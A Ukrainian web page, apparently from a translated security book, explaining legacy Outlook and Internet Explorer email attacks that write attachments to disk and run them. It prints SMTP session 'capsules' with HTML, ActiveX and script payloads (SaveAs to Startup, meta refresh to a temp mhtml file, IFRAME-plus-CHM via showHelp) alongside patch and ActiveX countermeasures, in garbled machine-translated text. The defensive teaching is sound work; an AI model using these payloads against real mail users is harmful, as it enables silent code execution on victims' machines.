LU.NET.UA - Захист інформації в інтернеті

:: Меню ::

Головна
Введення

Частина I.
Вивчення мети

1. Попередній збір даних
2. Сканування
3. Інвентаризація

Частина II.
Уразливість систем

4. Уразливість Windows 95/98/me
5. Уразливість Windows NT
6. Уразливість Windows 2000

Частина III.
Уразливість мереж

9. Уразливість видалених з'єднань, РВХ, Voicemail і віртуальних приватних мереж
10. Мережеві пристрої
11. Брандмауери
12. Атаки DOS

   Частина IV.
Уразливість програмного забезпечення

13. Вади засобів видаленого управління
14. Розширені методи
15. Уразливість в Web
16. Атаки на користувачів Internet
 Братани
Карта сайту
Добавити у вибране

:: Друзі ::

--

:: Статистика ::

 

 

 

 

 


Запис вкладень на диск без участі користувача

До цих пір мова йшла про різні механізми запуску файлів, які можна обманним шляхом помістити на видалений диск користувача. Описані вище види злому були розраховані на певні виконувані файли (розташовані або на видаленому сервері, або на диску користувача), що виконують свою брудну роботу. А що, якщо зломщик має можливість записувати на диск вибраної жертви свої файли? Користуючись цим, можна розробити завершений спосіб доставки в систему користувача і запуску в ній файлів, що реалізовують злом.

Перехоплення функції Save As програм Excel і Powerpoint


Фокус, лежачий в основі цього злому, був придуманий Георгієм Гунінськи, який дотепно скористався функцією Saveas програм Excel і Powerpoint. Як тільки документ Office за допомогою дескриптора OBJECT викликається в програмі Internet Explorer (про це вже згадувалося вищим), з'являється можливість зберегти дані в довільному місці диска. У своїй реалізації цієї ідеї Георгій зберігає дані, Bookl, що витягують з файлу.xi.r-. Він є звичайним файлом у форматі Excel з розширенням .xla. Якщо такий файл помістити в теку Startup, то під час завантаження системи він буде запущений.
У наступному прикладі приведений злегка змінений код Георгія, помішаний у вже знайому капсулу для злому електронної пошти.

helo somedomain.com
mail from: <mallory@attack.net>
rcpt to: <hapless@victim.net>
data
subject: Check this out!
Importance: high
Mime-version: 1.0
Content-type: text/html; charset=us-ascii
<HTML>
<h2>enticing message here!</h2>
id="shl" width=0
height=0>
</object>
<SCRIPT>
function f()
{
fn=" D:\\test\\georgi-xla.hta";
shl.object.SaveAs(fn,6);
alert(fn+" successfully written"};
}
settimeout{"f()",5000);
</script>
</html>
quit

Написаний Георгієм код розташований між дескрипторами <object> і </scrlpt>. Зміни внесені так, щоб вказати повну адресу URL файлу Bookl.xla (у первинній реалізації цей файл був доступний безпосередньо на Web-сервере). Вміст Bookl.xla записується у файл, вказаний в рядку fn=. З початкової коди Георгія видалені також рядки коментарів, в яких вказано, як зберегти цей файл (передбачається, що про це неважко здогадатися). Проглядання цього повідомлення в програмі Outlook Express системи Nt4 із зоною, для якої заданий рівень безпеки Low, приведе до несподіваної появи на короткий час вікна передачі файлу, услід за яким з'явиться наступне повідомлення.


Тут автори як матеріал скористалися вже готовим файлом Георгія Bookl.xla. Цей файл абсолютно нешкідливий. У нім міститься код завдовжки в пару рядків, який при запуску виводить у вікні DOS повідомлення Hello World. Проте зважаючи на збільшення числа серверів, що надають послуги з анонімного зберігання файлів, хакерові-зловмисникові буде зовсім нескладно створити свій власний документ Office і забезпечити його завантаження. Готовою базою для розміщення таких файлів також можуть бути погано настроєні або зламані сервери FTP.

Запобіжні засоби проти запису файлів за допомогою програм Excel і Powerpoint


Чи варто повторювати ще раз? Скористайтеся відповідними модулями оновлення, які можна знайти на Web-узле за адресою http://www.microsoft.com/ technet/security/bulletin/ms00-049. asp. Установка цих модулів оновлення приведе до того, що документи Excel і Powerpoint будуть помічені як "unsafe for scripting" (будь ласка, не поспішаєте сміятися). Звичайно, можна зовсім заборонити використання елементів управління ACTIVEX, як описано в розділі, присвяченому зонам безпеки, тим самим раз і назавжди закупоривши цей злощасний пролом.

Вкладення з примусовим завантаженням


Для описаного на Web-узле http://4-ww.malware.com способу завантаження файлу на диск користувача без його дозволу на цьому ж вузлі було запропоновано назву примусове завантаження (force feeding). Суть даного підходу полягає в тому, що, як затверджують фахівці, Outlook/oe ігнорує відповідь користувача на питання про те, що робити з файлом вкладення електронного повідомлення. Зазвичай, коли приєднаний файл запускається з поштової програми, користувачеві надається три варіанти дій: Open, Save To Disk або Cancel. Згідно твердженню, приведеному на вузлі malware.com, незалежно від вибору користувача вкладення буде записано в каталог Windows %temp% (З: \Windows\temp — в Win 9x і З: \temp — в NT). Тимчасові каталоги в Win 2000 настроюються по розсуду користувача, тому, якщо ця система встановлювалася "з нуля", а не поверх попередніх версій, визначити їх місцеположення складніше. Помістивши необхідні файли в систему користувача, їх можна запустити за допомогою спеціального дескриптора HTTP. При цьому броузеру скритно і автоматично буде передана сторінка, вказана в дескрипторі. Наприклад

<МЕТА Http-equiv="refresh"
content="2;URL=http://www.othersite.com">

Цей код, поміщений на Web-страницу, перенаправить броузер на Web-узел www.othersite.com. Параметр context= задає інтервал очікування, після закінчення якого броузером буде виконаний заданий перехід. Для примусового завантаження оператори вузла malware.com вибрали один з їх локальних файлів і помістили його адресу в дескриптор.
<meta http-equiv="refresh" content="5; 
url=mhtml:file://с:\windows\temp\lunar.mhtml">
У файлі lunar.mhtml, який був вкладений в повідомлення і завантажений без згоди користувача, міститься посилання на елемент управління ACTIVEX, помічений прапором "Safe for scripting", який запускає другий приєднаний файл. Він є виконуваним файлом з ім'ям mars . exe. У обхід, але достатньо ефективно.
Під час тієї, що виникла в бюлетені Bugtraq  дискусії з приводу цієї знахідки принаймні два авторитетні фахівці з вопросам'безопасності висловилися проти того, що описаний підхід працюватиме саме так, як передбачається. Тестування, зроблене авторами даної книги, проходило із змінним успіхом. Навіть за умови, що для відповідних зон IE (див. попередні розділи), використовуваних також для читання поштових повідомлень в програмах Outlook/oe, був встановлений рівень безпеки Low, позитивного ефекту вдавалося добитися не завжди. Успішне примусове завантаження вкладень відбувалося в тимчасовий каталог систем Win 98 SE і Nt4 Workstation, в яких для зон був встановлений рівень безпеки Low, але це відбувалося не завжди. Тайна примусового завантаження по рецепту malware.com поки залишається нерозгаданою.
Ця обставина злегка утішає. Лякає сама думка про ті неприємності, до яких міг би привести такий підхід у разі його застосування спільно з методом Георгія Гунінськи, що дозволяє запускати документи MS Office. Зломщики змогли б посилати документи Office, що містять у вигляді вкладень зловмисний код. Потім вони могли б послати друге повідомлення, що укладає в своєму тілі відповідні дескриптори, які указували б на каталог %temp%, де вже знаходилося б примусово завантажене вкладення. (По суті, Георгій добивався того ж результату, але з використанням одного повідомлення. Див. опис наступної атаки.)
Звичайно ж, як уже згадувалося, доступність служб, що надають можливість безкоштовного і анонімного зберігання файлів в Internet, позбавляє від необхідності зафузки коди на локальний диск. Вказавши в своїх повідомленнях адресу одну з таких сховищ, хакер відразу ж забезпечує доступність другого компоненту. При цьому самого зломщика вислідити практично неможливо.

Запис вкладення в каталог TEMP за допомогою дескриптора I FRAME


Даний метод, який в 2000 році був опублікований Георгієм в дев'ятому номері його інформаційного бюлетеня, продемонстрував далекоглядність його автора, якому вдалося уміло скористатися, здавалося б, незначними проблемами. Запропонований підхід заснований на тому, що програми Outlook і Outlook Express створюють в каталозі TEMP файли з відомим ім'ям і довільним вмістом, що дуже схоже на механізм, створений на вузлі malware.com. Проте, використавши інші свої розробки, до числа яких входить використання вади, що дозволяє запускати ярлики файлів довідкової системи Windows, і дескриптори IFRAME, Георгій розробив, мабуть, неперевершений несуперечливий механізм доставки коди і його подальшого запуску. Тому автори привласнили цьому методу ступінь риски, рівний восьми, тобто найвищу серед тих, що розглядаються. Він набагато ближче за інші алгоритми підійшов до того, щоб стати цілісним пакетом, надаючи можливість запису файлу на диск і запуску цього файлу без необхідності якого-небудь втручання користувача.
Фокус полягає у використанні в тілі поштового повідомлення дескриптора I FRAME, в якому міститься посилання на вкладення цього ж повідомлення. З якоїсь причини, можливо, відомою лише Георгию, коли i FRAME "торкається" до вкладеного файлу, він зберігається на диску. Потім цей файл легко викликати з сценарію, помішаного в тіло цього ж повідомлення. У своїй реалізації Георгій записує файл .снм, який елегантно конфігурований для запуску редактора Wordpad.exe за допомогою команди "shortcut".
Нижче представлена капсула, що демонструє застосування описаного підходу. Звернете увагу на те, що файл СНМ має бути упакований за допомогою утиліти mpack (див. розділ "Сто і один спосіб злому електронної пошти").

helo somedoir.ain.com
mail from: <mallory@attacker.net>
rcpt to: <hapless@victim.net>
data
subject: This one takes the саку!
Importance: high
Mime-version: 1.0
Content-type: multipart/mixed;
boundary="_boundaryl_"
--_boundaryl_--
Content-type: multipart/alternative
boundsry="_boundary2_"
--_boundary2_--
Content-type: text/html; charset=us-ascii
<IFRAME align=3dbaseline alt=3d"" =
border=3do hspace=3do=20
src=3d"cid:5551212"></iframe>
<SCRIPT>
settimeout('window.showHelp
("c:/windows/temp/abcde.chm");',1000);
settimeout('window.showHelp
("c:/temp/abcde.chm");',1000};
settimeout('window.showHelp
("C:/docume-l/admini~l/locals~l/temp/abcde.
chm"} ;
',1000} ; </script>
--_boundary2 --
--_boundaryl_--
Content-type: application/binary;
name="abcde.chm"
CONTENT-ID: <5551212>
Content-transfer-encoding: base64
[Закодуйте файл abode.chm з
допомогою утиліти mpack і вставте його тут]
—_boundaryl_—
quit

В процесі тестування, виконаного авторами на програмах Outlook і Outlook Express, встановлених в системах Windows 9x, NT і 2000, цей метод працював безвідмовно, найчастіше в режимі попереднього перегляду. Рядки, які починаються з settimeout, задають каталог кожній з трьох операційних систем. Чи зможете ви встановити між ними відповідність?
Одним з ключових елементів приведеного лістингу є поле CONTENT-ID. У нашому прикладі в цьому полі введено число 5551212. Параметр scr дескриптора IFRAME, який міститься в тілі повідомлення, посилається на ідентифікатор вкладення цього повідомлення, що має формат MIME. При цьому виникає дотепно задумане циклічне посилання, що дозволяє записати вкладення на диск і звернутися до нього з одного і того ж поштового повідомлення.

Контрзаходи проти використання дескрипторах FRAME


Єдиним захистом проти атак такого роду є обережне поводження з елементами управління ACTIVEX, як згадувалося в розділі, присвяченому зонам безпеки. Про випуск відповідного модуля оновлення компанія Microsoft не поклопоталася.




:: Реклама ::

>Страница статей


:: Посилання ::

-


:: Рекомендуємо ::

-


 

 

 

 


Copyright © Klab-F 2008